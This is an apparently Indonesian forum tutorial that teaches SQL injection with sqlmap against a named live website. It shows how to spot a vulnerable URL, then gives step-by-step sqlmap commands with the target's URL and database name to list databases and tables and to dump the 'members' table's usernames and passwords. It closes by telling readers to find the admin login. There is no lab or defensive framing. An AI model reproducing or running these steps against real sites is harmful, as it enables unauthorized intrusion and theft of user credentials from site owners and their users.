Tuturial sqlamp secara lengkap langsung aja gan download Bahan"nya di bawah ini
Phyton :
download disini Sqlmap :
download disinisetelah semua bahan sudah terkumpulkan sekarang kita langsung mencari web/ target yg Vuln
1. Install dlo Phyton nya
2. Extrack sqlmap nya dan copy file nya ke Drive C:
3. Untuk mengetahui Website tersebut Vuln Sqli kita tambahkan tanda ( ' ) di akhir Url
Jika website tersebut Vuln maka akan muncul seperti gambar berikut ini
4. disini saya sudah mendapatkan web yang vuln
http://www.pushingpetals.com/buy.php?id=555. ok langsung saja kita buka sqlmap nya buka Cmd atau tekan Windows + R
6. Ketik pada CMD dengan Perintah
cd/ lalu ketik lagi perintah
cd/sqlmap sehingga tampak seperti gambar berikut ini
7. langsung aja ketik perintah berikut
sqlmap.py -u URL Target --dbsContoh :
sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 --dbs lalu Tekan Enter8. tuh keliatan kan Database nya , sekarang kita coba untuk scan data base nya
dengan perintah
sqlmap.py -u Url Target - D nama database --tables contoh :
sqlmap.py -u
http://www.pushingpetals.com/buy.php?id=55 -D db410405659 --tablesMaka hasil nya akan seperti ini
9. Keliatan kan isi table Database nya , sekarang kita coba scan table tersebut (
cari menurut kalian di table mana terdapat user name dan password admin web nya )
ane coba scan table
Members aja
dengan perinta
sqlmap.py -u Url Target - D nama_database -T nama_table --columns contoh :
sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members --columnslalu tekan enter dan hasil nya seperti ini
10. Nah keliatan tuh table username dan password , untuk melihat isi table nya kita ketik perintah
sqlmap.py -u Url Target -D nama_database -T Nama_table -C nama_kolom --dump
contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members -C username,password --dump
lalu tekan enter ,
11. setelah kita tekan enter makan akan muncul username dan password nya seperti gambar berikut
tinggal kita cari login admin nya
sekian dlo tutor dari ane mudah"an bermanfaat y Gan